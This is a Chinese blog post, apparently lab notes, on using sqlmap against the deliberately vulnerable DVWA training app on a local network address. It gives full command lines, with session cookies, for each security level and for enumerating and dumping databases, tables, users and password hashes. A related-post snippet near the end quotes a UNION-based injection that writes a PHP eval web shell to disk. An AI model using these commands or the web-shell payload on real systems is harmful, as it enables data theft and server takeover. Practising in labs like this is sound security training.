【sqlmap命令学习及测试dvwa_SQL_Injection】

于 2024-06-26 01:09:19 发布
阅读量426 收藏 5
点赞数 4
分类专栏: DVWA 文章标签: Sqlmap DVWA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58553228/article/details/139971799
版权

文章目录

1.sqlmap命令及 不同级别探索 能否注入
命令option
sqlmap
-u ""
--cookie="xx=xx;xx=xx"
--data="xx=xx&xx=xx"
1.1 low等级
目标url:
`http://192.168.1.2/dvwa/vulnerabilities/sqli/`

存在:可输入查询框

在这里插入图片描述


输入参数后url变为:
http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

结论:该请求用GET方法


利用sqlmap对目标进行测试:
参考命令option:

在这里插入图片描述
输入命令:
sqlmap.py -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"


提醒需要cookie,有自己的security和PHPSESSID
在这里插入图片描述
参考目录option:
在这里插入图片描述

输入命令:
sqlmap.py -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=kh9j2ni5lp0av02opq2v139nlo; security=low"


注入成功:
在这里插入图片描述

总结:cookie作为session凭证,请求message通过GET方式时需要携带在请求头。

1.2 Medium等级

图:指定参数选项查询
在这里插入图片描述

点击查询示例:
现象:url未改变,改变请求方式了,观察开发工具,method改为POST,参数输入到请求体
在这里插入图片描述
结论:需要POST方式的HTTP请求。

参考参数:
在这里插入图片描述

命令:

sqlmap.py -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSE SSID=kh9j2ni5lp0av02opq2v139nlo;security=medium"
成功注入
在这里插入图片描述

1. 3 High等级

第二页面输入参数,但还是利用POST的http请求。
在这里插入图片描述
都是EGT
在这里插入图片描述


输入命令

sqlmap.py -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit" --second-u="http://192.168.1.2/dvwa/vulnerabilities/sqli/session-input.php/id=1" --cookie="PHPSESSID=jlkgo8c1vcamdbol2jrtvfr1o0; security=high"

执行成功:
在这里插入图片描述

2. 注入流程

在确定能注入后,需要走的步骤;(low等级示例)
纵向:库-表-字段-内容-当前用户信息
横向:拖库

2.1 数据库
--dbs

sqlmap.py -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=jlkgo8c1vcamdbol2jrtvfr1o0; security=low" --dbs
2.2 指定数据库表名
-D 库名 --tables

sqlmap.py -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=jlkgo8c1vcamdbol2jrtvfr1o0; security=low" -D dvwa --tables
2.3 指定表的 字段名
-T 表名--columns

sqlmap.py -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=jlkgo8c1vcamdbol2jrtvfr1o0; security=low" -T users --columns
2.4 内容
-D 库名 -T 表名 -C 字段名 --dump

sqlmap.py -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=jlkgo8c1vcamdbol2jrtvfr1o0; security=low" -D dvwa -T users --columns -C user --dump
2.5 当前用户信息

前提:当前用户有权限,读取包含所有用户的那张表

--users

sqlmap.py -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=jlkgo8c1vcamdbol2jrtvfr1o0; security=low" --users
2.6 用户密码

前提:当前用户有读取包含用户密码那张表的 权限
–passwords

	sqlmap.py -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=jlkgo8c1vcamdbol2jrtvfr1o0; security=low" --passwords

解析处理,可能还需结合 加密算法逆向/解密

2.7 其他

  当前用户是否未管理权限
--is-dba

sqlmap.py -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=jlkgo8c1vcamdbol2jrtvfr1o0; security=low" --is-dba

  当前site使用的数据库名:

--current-db

sqlmap.py -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=jlkgo8c1vcamdbol2jrtvfr1o0; security=low" --current-db

  当前site的其他用户
--current-user

sqlmap.py -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=jlkgo8c1vcamdbol2jrtvfr1o0; security=low" --current-user
qq_58553228
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap sql 注入测试工具
03-06
6. `sqlmap_test`文件可能包含的是一个示例测试用例,用户可以参考这个文件学习如何设置和运行SQLMap测试场景。 总之,SQLMap是一个强大且全面的SQL注入测试工具,对于保障Web应用程序的安全性具有重要作用。熟练...
SQL_zhuru.rar_sql 注入_sql注入
09-24
内容可能包括了使用各种工具(如Burp Suite、sqlmap等)进行自动化SQL注入测试的步骤,以及如何编写安全的SQL代码,如参数化查询、预编译语句和输入验证等防御措施。 SQL注入的危害巨大,可能导致数据泄露、系统...
sqlmap-----DVWA测试
weixin_30883271的博客
06-17 161
dvwa为例,难度简单,使用get方法请求 1.简单试探 sqlmap -u "http://10.2.4.120/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" 返回sqlmap got a 302 redirect to xxx ,是一个重定向,考虑是否需要加入cookie信息。 2.加入cookie ...
sqlmap dvwa注入测试
weixin_45774059的博客
06-05 250
带上cookie爆出数据库 sqlmap -u "https://192.168.43.203/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit# " --cookie="security=low; PHPSESSID=6tuf1mkr1snkgcgdi0e4gaiam9 " --dbs 列出当前数据库的详细信息 sqlmap -u "https://192.168.43.203/DVWA/vulnerabilities...
注入之SQLMAP,入门手记(DVWA测试环境)
jin9xiao的博客
03-25 397
安装好sqlmap,将路径添加到环境变量 首先找到注入点:http://192.168.137.192/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit 然后进入cmd, 输入: sqlmap.py -u"http://192.168.137.192/DVWA-1.9/vulnerabilities/sqli/?id=2&S...
SQL 注入 DVWA 实验
m0_63645854的博客
04-10 2078
SQL注入与自动注入
sql注入dvwa
weixin_45670595的博客
03-07 3799
SQL injection %28 ( %29 ) %2c , %23 # 写一句话木马 ?id = 1'+union+select+"<?php @eval($_GET['cmd']);?>","webshell" +into+outfile+ 'D:\\phpstudy\\WWW\\dvwa\\cmd.php' --+&Submit=Submit# 关于mysql注释的用法 (dvwa是mysql,post方式) low 1' or '1' ='1
sqlmap自动扫描器.zip_sqlmap_sqlmap扫描器_sql工具
09-23
SQLMap是一款强大的、自动化SQL注入攻击工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全研究人员或渗透测试人员快速、有效地发现和利用数据库服务器的潜在漏洞。在这个"sqlmap自动扫描器.zip"压缩包中,包含...
sqlmap_自动化sql注入引擎_None_sqlmap_sql注入_sql_flath1c_vulnerability_
10-02
SQL注入(SQLi)是一种注入攻击,,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页...
Mysql-blind-inject.zip_Blind sql injection_SQL inject_blind_blin
09-24
- 学习资源:OWASP SQL Injection Prevention Cheat Sheet、在线教程和安全社区。 7. **防御策略**: - 应用程序开发人员应该遵循安全编码最佳实践,定期进行代码审查和渗透测试。 - 使用最新的数据库管理系统...
sqlmap自动化漏洞利用(DVWA初、中、高)
qq_42620328的博客
10-14 7094
sqlmap自动化漏洞利用(DVWA
网络渗透测试实验3:SQL注入(DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 1875
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
Sqlmap
mumuzi2的博客
02-25 388
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
自学渗透测试:使用 DVWASQLmap 探寻 SQL 注入攻击与防范
weixin_43263566的博客
01-04 2581
SQL注入漏洞
DVWA之暴力破解二(手动注入和使用sqlmap
cai_huaer的博客
04-19 907
因为之前我们是登录进来,所以有一个cookie,现在我们之间用url去请求,没有附带cookie,所以这时是需要重新回到登录页面的。再回到之前的源代码那,可以看到,密码是md5加密后再存的,所以在网上搜索md5解密,把爆破出来的密码成功还原。然后我们分析,user变量是用单引号‘去识别的,那我们在输入的时候,自己加入’后再加入一些其他的内容是不是也可以。后台数据库是MySQL,然后有两个数据库,一个是information_schema,一个是dvwa。3.接着,我们继续注入,爆破所有的数据库。
DVWA靶场通关记录(SQL注入)
weixin_73557450的博客
05-13 1005
在MySQL中,自带的库为information_schema,其中包含MySQL中所有的数据库信息,包括所有库名、表名和列名。可以通过这个自带库获取信息。其中的表tables存储表名,表columns存储列名,通过句点“.”来连接上下级关系,例如:information_schema.tables。使用database()语句可以查询当前所在的数据库名称,user()可以查询当前登录的用户名。
SQLMAP注入DVWA实战
m0_62636343的博客
05-12 2186
SQLMAP注入DVWA
【渗透测试】|sqlmap工具注入-基于dvwasql injection
最新发布
yangdan_jiayou的博客
03-27 641
这个检测结果表明系统对联合查询的处理方式存在漏洞,可以通过联合查询来获取额外的信息或执行其他操作。这个检测结果表明系统对错误消息的处理方式存在漏洞,可以通过错误消息来推断数据库的结构或内容,从而进行注入攻击。这个payload试图通过在查询中嵌入一个时间延迟函数来验证注入点的存在,如果系统在执行这个查询时发生了延迟,那么说明注入点存在,攻击者可以进一步利用这个注入点执行其他操作。这个payload尝试通过在查询中嵌入一个错误,然后通过错误消息中的内容来获取敏感信息或执行其他恶意操作。
使用SQLmap检测SQL注入:DVWA实战教程
“通过sqlnamp检测sql注入漏洞的随堂笔记,包括安装SQLmapDVWA,以及SQL注入的概述和SQLmap的介绍。” 在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过在Web应用的输入字段中插入恶意SQL代码,来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值